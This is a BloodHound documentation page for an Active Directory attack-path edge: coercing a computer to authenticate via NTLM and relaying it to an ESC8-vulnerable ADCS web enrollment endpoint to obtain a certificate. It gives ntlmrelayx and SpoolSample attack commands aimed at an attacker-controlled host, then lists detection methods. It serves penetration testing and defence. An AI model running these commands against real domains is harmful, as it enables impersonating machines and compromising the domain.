Skip to main content
Applies to BloodHound Enterprise and CE This edge indicates that an attacker with “Authenticated Users” access can trigger SMB-based coercion from the target computer to their attacker-controlled host via NTLM. The authentication attempt from the target computer can then be relayed to an ESC8-vulnerable web enrollment endpoint of an Active Directory Certificate Services (ADCS) enterprise CA server. This allows the attacker to obtain a certificate enabling domain authentication as the target computer.

Abuse Info

This section provides general guidance about abusing this edge. For detailed instructions, see references at the end of this article.

Linux

  1. Start the Relay Server The NTLM relay can be executed with ntlmrelayx.py. To relay to the enterprise CA and enroll a certificate, specify the HTTP(S) endpoint as the target and use the following arguments: 
    impacket-ntlmrelayx -t {Target} --adcs --template {Template Name} -smb2support
  2. Coerce the Target Computer Several coercion methods are documented here: Windows Coerced Authentication Methods. Examples of tools include: To trigger WebClient coercion (instead of regular SMB coercion), the listener must use a WebDAV Connection String format: \\SERVER_NETBIOS@PORT/PATH/TO/FILE.

Windows

  1. Start the Relay Server The NTLM relay can be executed with Inveigh.
  2. Coerce the Target Computer Several coercion methods are documented here: Windows Coerced Authentication Methods. Examples of tools include: To trigger WebClient coercion (instead of regular SMB coercion), the listener must use a WebDAV Connection String format: \\SERVER_NETBIOS@PORT/PATH/TO/FILE. 
    SpoolSample.exe "VICTIM_IP" "ATTACKER_NETBIOS@PORT/file.txt"

Opsec Considerations

Detection of NTLM Relay

NTLM relayed authentications can be detected by login events where the IP address does not match the computer’s actual IP address. This detection technique is described in the Detecting NTLM Relay Attacks blog post.

Detection of Certificate Usage

Authentication using the obtained certificate is another detection opportunity. If Kerberos authentication is used, a domain controller will generate Windows Event ID 4768 (“A Kerberos authentication ticket (TGT) was requested”). This event will include the attacker’s IP address rather than the target computer’s IP address. Similarly, for Schannel authentication, Event ID 4624 will reveal the incorrect IP address. These detection techniques are described in detail under DETECT2 in the Certified Pre-Owned whitepaper.

Edge Schema

Source: Authenticated Users, Group
Destination: Computer
Traversable: Yes

References